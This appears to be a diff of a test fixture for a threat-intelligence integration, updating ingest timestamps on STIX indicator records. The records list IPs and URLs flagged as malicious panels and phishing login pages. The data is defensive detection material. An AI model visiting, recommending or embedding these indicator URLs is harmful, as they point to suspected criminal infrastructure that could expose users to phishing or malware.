@@ -22724,7 +22724,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025405200Z", + "ingested": "2021-12-14T14:57:43.118388447Z", "original": "{\"created\":\"2020-02-20T04:32:52.041Z\",\"description\":\"TS ID: 55321824444; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--b6863ec6-1752-43b3-b748-ee8a29b6a52e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T04:32:52.041Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.041Z\"}", "category": "threat", "type": "indicator", @@ -22775,7 +22775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025412400Z", + "ingested": "2021-12-14T14:57:43.118388928Z", "original": "{\"created\":\"2020-02-20T04:32:52.057Z\",\"description\":\"TS ID: 55321824423; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--fb1aa473-4d9d-46a3-b053-ae7c051d0e14\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:32:52.057Z\",\"name\":\"mal_url: http://lae9ac50.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lae9ac50.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.057Z\"}", "category": "threat", "type": "indicator", 
@@ -22826,7 +22826,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025419500Z", + "ingested": "2021-12-14T14:57:43.118389425Z", "original": "{\"created\":\"2020-02-20T04:32:52.074Z\",\"description\":\"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f4447d70-3217-4319-9b89-4439db608f67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-20T04:32:52.074Z\",\"name\":\"mal_url: http://ld01c555.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld01c555.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.074Z\"}", "category": "threat", "type": "indicator", @@ -22878,7 +22878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025426600Z", + "ingested": "2021-12-14T14:57:43.118389859Z", "original": "{\"created\":\"2020-02-20T04:49:13.452Z\",\"description\":\"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--93e03851-428e-4e25-9fa6-17383426a6d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:49:13.452Z\",\"name\":\"mal_url: http://borrdrillling.com/psm91/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:13.452Z\"}", "category": "threat", "type": "indicator", 
@@ -22929,7 +22929,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025433900Z", + "ingested": "2021-12-14T14:57:43.118390379Z", "original": "{\"created\":\"2020-02-20T04:49:22.233Z\",\"description\":\"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:49:22.233Z\",\"name\":\"mal_url: http://wtfshop.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wtfshop.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:22.233Z\"}", "category": "threat", "type": "indicator", @@ -22980,7 +22980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025441Z", + "ingested": "2021-12-14T14:57:43.118390837Z", "original": "{\"created\":\"2020-02-20T04:50:21.678Z\",\"description\":\"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:50:21.678Z\",\"name\":\"mal_url: http://minecrafttusa1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecrafttusa1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.678Z\"}", "category": "threat", "type": "indicator", 
@@ -23025,7 +23025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025448100Z", + "ingested": "2021-12-14T14:57:43.118391277Z", "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", "category": "threat", "type": "indicator", @@ -23070,7 +23070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025455200Z", + "ingested": "2021-12-14T14:57:43.118391717Z", "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", "category": "threat", "type": "indicator", 
@@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025459200Z", + "ingested": "2021-12-14T14:57:43.118392201Z", "original": "{\"created\":\"2020-02-20T04:51:08.292Z\",\"description\":\"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-20T04:51:08.292Z\",\"name\":\"mal_url: http://amazon-fr.fun/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amazon-fr.fun/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:51:08.292Z\"}", "category": "threat", "type": "indicator", @@ -23172,7 +23172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025464400Z", + "ingested": "2021-12-14T14:57:43.118392636Z", "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", "category": "threat", "type": "indicator", 
@@ -23223,7 +23223,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025469900Z", + "ingested": "2021-12-14T14:57:43.118393027Z", "original": "{\"created\":\"2020-02-20T05:16:27.52Z\",\"description\":\"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-20T05:16:27.52Z\",\"name\":\"mal_url: http://f0400017.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400017.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.52Z\"}", "category": "threat", "type": "indicator", @@ -23274,7 +23274,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025474900Z", + "ingested": "2021-12-14T14:57:43.118393523Z", "original": "{\"created\":\"2020-02-20T05:16:27.557Z\",\"description\":\"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--52371067-94be-4a79-b45d-8de115e81e86\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-20T05:16:27.557Z\",\"name\":\"mal_url: http://f0391202.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391202.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.557Z\"}", "category": "threat", "type": "indicator", 
@@ -23325,7 +23325,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025478800Z", + "ingested": "2021-12-14T14:57:43.118393963Z", "original": "{\"created\":\"2020-02-20T05:16:37.354Z\",\"description\":\"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:16:37.354Z\",\"name\":\"mal_url: http://ld7fa9c9.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:37.354Z\"}", "category": "threat", "type": "indicator", @@ -23370,7 +23370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025483900Z", + "ingested": "2021-12-14T14:57:43.118394427Z", "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", "category": "threat", "type": "indicator", 
@@ -23422,7 +23422,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025491300Z", + "ingested": "2021-12-14T14:57:43.118394877Z", "original": "{\"created\":\"2020-02-20T05:16:57.739Z\",\"description\":\"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:16:57.739Z\",\"name\":\"mal_url: http://referral-casino.club/1/stats/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://referral-casino.club/1/stats/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.739Z\"}", "category": "threat", "type": "indicator", @@ -23474,7 +23474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025495600Z", + "ingested": "2021-12-14T14:57:43.118395410Z", "original": "{\"created\":\"2020-02-20T05:16:57.764Z\",\"description\":\"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:16:57.764Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.764Z\"}", "category": "threat", "type": "indicator", 
@@ -23526,7 +23526,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025500200Z", + "ingested": "2021-12-14T14:57:43.118395895Z", "original": "{\"created\":\"2020-02-20T05:16:57.791Z\",\"description\":\"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-20T05:16:57.791Z\",\"name\":\"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.791Z\"}", "category": "threat", "type": "indicator", @@ -23571,7 +23571,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025503700Z", + "ingested": "2021-12-14T14:57:43.118396278Z", "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", "category": "threat", "type": "indicator", 
@@ -23623,7 +23623,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025509Z", + "ingested": "2021-12-14T14:57:43.118396849Z", "original": "{\"created\":\"2020-02-20T05:18:20.205Z\",\"description\":\"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-20T05:18:20.205Z\",\"name\":\"mal_url: http://liweff.eu/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.205Z\"}", "category": "threat", "type": "indicator", @@ -23675,7 +23675,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025514700Z", + "ingested": "2021-12-14T14:57:43.118397332Z", "original": "{\"created\":\"2020-02-20T05:18:20.412Z\",\"description\":\"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:20.412Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.412Z\"}", "category": "threat", "type": "indicator", 
@@ -23727,7 +23727,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025521100Z", + "ingested": "2021-12-14T14:57:43.118397798Z", "original": "{\"created\":\"2020-02-20T05:18:22.703Z\",\"description\":\"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:22.703Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:22.703Z\"}", "category": "threat", "type": "indicator", @@ -23779,7 +23779,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025528400Z", + "ingested": "2021-12-14T14:57:43.118398194Z", "original": "{\"created\":\"2020-02-20T05:18:31.965Z\",\"description\":\"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:31.965Z\",\"name\":\"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.965Z\"}", "category": "threat", "type": "indicator", 
@@ -23831,7 +23831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025535800Z", + "ingested": "2021-12-14T14:57:43.118398828Z", "original": "{\"created\":\"2020-02-20T05:18:31.986Z\",\"description\":\"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:31.986Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.986Z\"}", "category": "threat", "type": "indicator", @@ -23883,7 +23883,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025543Z", + "ingested": "2021-12-14T14:57:43.118399291Z", "original": "{\"created\":\"2020-02-20T05:18:33.111Z\",\"description\":\"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-20T05:18:33.111Z\",\"name\":\"mal_url: http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:33.111Z\"}", "category": "threat", "type": "indicator", 
@@ -23934,7 +23934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025550100Z", + "ingested": "2021-12-14T14:57:43.118399700Z", "original": "{\"created\":\"2020-02-20T05:18:47.389Z\",\"description\":\"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-20T05:18:47.389Z\",\"name\":\"mal_url: http://rds2020.space/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rds2020.space/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.389Z\"}", "category": "threat", "type": "indicator", @@ -23985,7 +23985,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025557400Z", + "ingested": "2021-12-14T14:57:43.118400157Z", "original": "{\"created\":\"2020-02-20T05:18:47.406Z\",\"description\":\"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d723c08e-997d-483e-91e0-2ba6048e3683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-20T05:18:47.406Z\",\"name\":\"mal_url: http://vysyyvyvm.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vysyyvyvm.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.406Z\"}", "category": "threat", "type": "indicator", 
@@ -24037,7 +24037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025564600Z", + "ingested": "2021-12-14T14:57:43.118400690Z", "original": "{\"created\":\"2020-02-20T05:18:47.424Z\",\"description\":\"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:18:47.424Z\",\"name\":\"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.424Z\"}", "category": "threat", "type": "indicator", @@ -24089,7 +24089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025571700Z", + "ingested": "2021-12-14T14:57:43.118401081Z", "original": "{\"created\":\"2020-02-20T05:18:52.122Z\",\"description\":\"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-20T05:18:52.122Z\",\"name\":\"mal_url: http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:52.122Z\"}", "category": "threat", "type": "indicator", 
@@ -24141,7 +24141,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025578900Z", + "ingested": "2021-12-14T14:57:43.118401463Z", "original": "{\"created\":\"2020-02-20T05:19:37.033Z\",\"description\":\"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--4c7e5535-9899-4967-86bb-e303b03a1122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:19:37.033Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.033Z\"}", "category": "threat", "type": "indicator", @@ -24193,7 +24193,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025586200Z", + "ingested": "2021-12-14T14:57:43.118401952Z", "original": "{\"created\":\"2020-02-20T05:19:37.099Z\",\"description\":\"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ea537667-1f37-4050-bb51-85fee813e39c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:37.099Z\",\"name\":\"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.099Z\"}", "category": "threat", "type": "indicator", 
@@ -24245,7 +24245,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025593500Z", + "ingested": "2021-12-14T14:57:43.118402513Z", "original": "{\"created\":\"2020-02-20T05:19:44.991Z\",\"description\":\"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:44.991Z\",\"name\":\"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:44.991Z\"}", "category": "threat", "type": "indicator", @@ -24296,7 +24296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.025669400Z", + "ingested": "2021-12-14T14:57:43.118402954Z", "original": "{\"created\":\"2020-02-20T05:19:49.844Z\",\"description\":\"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-20T05:19:49.844Z\",\"name\":\"mal_url: http://f0404175.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404175.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:49.844Z\"}", "category": "threat", "type": "indicator", 
